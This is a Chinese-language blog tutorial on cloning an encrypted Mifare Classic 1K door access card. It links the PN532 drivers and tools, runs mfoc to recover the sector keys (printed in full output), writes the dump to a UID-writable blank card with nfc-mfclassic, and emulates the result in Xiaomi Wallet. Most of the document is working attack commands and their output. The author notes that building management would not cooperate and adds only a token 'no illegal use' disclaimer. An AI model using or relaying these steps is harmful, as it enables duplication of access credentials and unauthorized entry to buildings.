使用小米手机nfc模拟加密门卡

前言

支持nfc的小米可以模拟不加密的门卡，加密的需要使用小米白卡功能到物业里写入。嗯。。。物业怎么可能配合嘛！不如自己破解折腾一下，成本也不会太高。

本教程仅支持Mifare Classic 1K卡的破解，和写入小米手机的过程。不能用于其它非法用途。

原理

破解后的卡信息

上图中，扇区0里保存着卡的id信息，一般都会被写保护，但是有不锁扇区0的uid卡。扇区5是加密扇区，浅绿色是keyA，深绿色是keyB。我们就是通过破解加密扇区的keyA、keyB来获取该扇区数据信息并最终写入到小米手机中。

准备工作

硬件：支持nfc的小米手机；要破解的门卡；pn532，淘宝30几块钱，最好买usb芯片焊好的；uid白卡滴胶卡，不锁扇区0的，淘宝5块钱一大把，买前问下掌柜。
软件：win驱动，破解工具nfc-tools（pn532文件夹下），mifare。链接: https://pan.baidu.com/s/1sHoHCWKlv8s_GFpNVEVi7g 提取码: vp89

先在手机上安装mifare。
然后电脑安装驱动。有两个版本，v1200是最新的版本，v110是老版。我的win10不能使用v1200驱动，会出现感叹号。

v1200

这种情况下安装v100驱动，并在设备管理器里的设备上右键选择更新驱动程序->浏览我的计算机以查找驱动程序软件->让我从计算机上的可用驱动程序列表中选取

选择驱动版本

选择2009年的版本，点下一步安装

驱动安装成功

这时设备上的感叹号应该没有了，并且挂载到了COM5端口

打开pn532文件夹下的libnfc.conf文件

修改端口

将配置里的端口改成你实际挂载的端口

最后测试一下。把你的门卡放在pn532上。在下载的pn532文件夹下shift加右键打开菜单，选择在此处打开powershell窗口，输入.\nfc-list命令

PS C:\apps\pn532> .\nfc-list
C:\apps\pn532\nfc-list.exe uses libnfc 1.7.1
NFC device: pn532_uart:COM5 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04
       UID (NFCID1): 24  99  01  dd
      SAK (SEL_RES): 08

如果出现以上信息，说明pn532运行成功了

操作

使用mfoc破解加密卡

把门卡放在pn532上，在终端输入.\mfoc -P 50 -T 30 -O mycard.mfd命令开始破解

PS C:\apps\pn532> .\mfoc -P 50 -T 30 -O mycard.mfd
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04
* UID size: single
* bit frame anticollision supported
       UID (NFCID1): 24  99  01  dd
      SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found

[Key: ffffffffffff] -> [xxxxx.xxxx......]
[Key: a0a1a2a3a4a5] -> [xxxxx.xxxx......]
[Key: d3f7d3f7d3f7] -> [xxxxx.xxxx......]
[Key: 000000000000] -> [xxxxx.xxxx......]
[Key: b0b1b2b3b4b5] -> [xxxxx.xxxx......]
[Key: 4d3a99c351dd] -> [xxxxx.xxxx......]
[Key: 1a982c7e459a] -> [xxxxx.xxxx......]
[Key: aabbccddeeff] -> [xxxxx.xxxx......]
[Key: 714c5c886e97] -> [xxxxx.xxxx......]
[Key: 587ee5f9350f] -> [xxxxx.xxxx......]
[Key: a0478cc39091] -> [xxxxx.xxxx......]
[Key: 533cb6c723f6] -> [xxxxx.xxxx......]
[Key: 8fd0a4f256e9] -> [xxxxx.xxxx......]

Sector 00 - Found   Key A: ffffffffffff Found   Key B: ffffffffffff
Sector 01 - Found   Key A: ffffffffffff Found   Key B: ffffffffffff
Sector 02 - Found   Key A: ffffffffffff Found   Key B: ffffffffffff
Sector 03 - Found   Key A: ffffffffffff Found   Key B: ffffffffffff
Sector 04 - Found   Key A: ffffffffffff Found   Key B: ffffffffffff
Sector 05 - Unknown Key A               Unknown Key B
Sector 06 - Found   Key A: ffffffffffff Found   Key B: ffffffffffff
Sector 07 - Found   Key A: ffffffffffff Found   Key B: ffffffffffff
Sector 08 - Found   Key A: ffffffffffff Found   Key B: ffffffffffff
Sector 09 - Found   Key A: ffffffffffff Found   Key B: ffffffffffff
Sector 10 - Unknown Key A               Unknown Key B
Sector 11 - Unknown Key A               Unknown Key B
Sector 12 - Unknown Key A               Unknown Key B
Sector 13 - Unknown Key A               Unknown Key B
Sector 14 - Unknown Key A               Unknown Key B
Sector 15 - Unknown Key A               Unknown Key B


Using sector 00 as an exploit sector
Sector: 5, type A, probe 0, distance 12969 .....
Sector: 5, type A, probe 1, distance 13027 .....
Sector: 5, type A, probe 2, distance 12823 .....
Sector: 5, type A, probe 3, distance 12879 .....
Sector: 5, type A, probe 4, distance 12519 .....
Sector: 5, type A, probe 5, distance 12619 .....
Sector: 5, type A, probe 6, distance 12679 .....
Sector: 5, type A, probe 7, distance 12527 .....
Sector: 5, type A, probe 8, distance 12525 .....
Sector: 5, type A, probe 9, distance 12577 .....
Sector: 5, type A, probe 10, distance 12569 .....
Sector: 5, type A, probe 11, distance 12625 .....
Sector: 5, type A, probe 12, distance 12615 .....
Sector: 5, type A, probe 13, distance 12669 .....
Sector: 5, type A, probe 14, distance 12565 .....
Sector: 5, type A, probe 15, distance 12623 .....
Sector: 5, type A, probe 16, distance 12569 .....
  Found Key: A [3aa93eb6a6eb]
  Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Sector: 10, type A, probe 0, distance 12571 .....
Sector: 10, type A, probe 1, distance 12569 .....
  Found Key: A [bdbb578b6c89]
  Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
Sector: 11, type A
  Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
  Found Key: A [bdbb578b6c89]
Sector: 12, type A
  Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
  Found Key: A [bdbb578b6c89]
Sector: 13, type A
  Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
  Found Key: A [bdbb578b6c89]
Sector: 14, type A
  Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
  Found Key: A [bdbb578b6c89]
Sector: 15, type A
  Data read with Key A revealed Key B: [000000000000] - checking Auth: Failed!
  Found Key: A [bdbb578b6c89]
Sector: 5, type B, probe 0, distance 12721 .....
Sector: 5, type B, probe 1, distance 12621 .....
Sector: 5, type B, probe 2, distance 12621 .....
Sector: 5, type B, probe 3, distance 12573 .....
  Found Key: B [0604acbb55d5]
Sector: 10, type B
  Found Key: B [bdbb578b6c89]
Sector: 11, type B
  Found Key: B [bdbb578b6c89]
Sector: 12, type B
  Found Key: B [bdbb578b6c89]
Sector: 13, type B
  Found Key: B [bdbb578b6c89]
Sector: 14, type B
  Found Key: B [bdbb578b6c89]
Sector: 15, type B
  Found Key: B [bdbb578b6c89]
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key bdbb578b6c89 :00  00  00  00  00  00  7f  07  88  69  00
00  00  00  00  00
....

从输出信息中可以发现mfoc找到了3个key: 3aa93eb6a6eb，bdbb578b6c89，0604acbb55d5。记一下，之后会用到。

运行成功后会在pn532文件夹下生成mycard.mfd文件

写入uid白卡

把从淘宝上买的白卡放到pn532下，运行.\nfc-mfclassic W a mycard.mfd。运行成功后会克隆一张与原门卡信息一样的卡。

PS C:\apps\pn532> .\nfc-mfclassic W a mycard.mfd
NFC reader: pn532_uart:COM5 opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04
       UID (NFCID1): 24  99  01  dd
      SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Sent bits:     50  00  57  cd
Sent bits:     40 (7 bits)
Received bits: a (4 bits)
Sent bits:     43
Received bits: 0a
Writing 64 blocks |................................................................|
Done, 64 of 64 blocks written.

需要注意的是，输出的最后一行一定要有Done，否则都是失败。

清空白卡数据扇区

目前克隆好的白卡和原门卡一样，存在加密扇区，是不能直接模拟到小米手机上的。我们需要把白卡里除扇区0的数据都清掉。

打开手机上的mifare软件。选择增加密钥文件，新建一个mykey.keys文件。第一行固定为FFFFFFFFFFFF，然后把上面用mfoc找到的密钥复制进去并保存。回到主菜单选择写标签->工厂格式化，勾选自定义的密钥文件。将克隆好的白卡放到手机背部，识别后点击启动映射并格式化标签。完成后使用读标签功能看下除扇区0外其他扇区是不是都清空了。

清空数据扇区

将扇区0克隆到手机上

打开小米钱包app，选择门卡->模拟实体门卡。点开始检测后，将清了数据的白卡放到手机背部，检测到并通过认证后开始模拟。模拟完成后双击电源键可以看到我们模拟的卡。

克隆到手机上

写入其它数据扇区

双击电源键找到模拟的卡，手机提示请靠近读卡器后，将手机背面放到pn532上。终端输入命令.\nfc-mfclassic w a mycard.mfd。注意中间的w是小写。

PS C:\apps\pn532> .\nfc-mfclassic w a mycard.mfd
NFC reader: pn532_uart:COM5 opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
    ATQA (SENS_RES): 00  04
       UID (NFCID1): 24  99  01  dd
      SAK (SEL_RES): 28
Guessing size: seems to be a 1024-byte card
Writing 64 blocks |...............................................................|
Done, 63 of 64 blocks written.

但输出为Done后，加密门卡模拟就全部成功了。去刷门禁试试吧。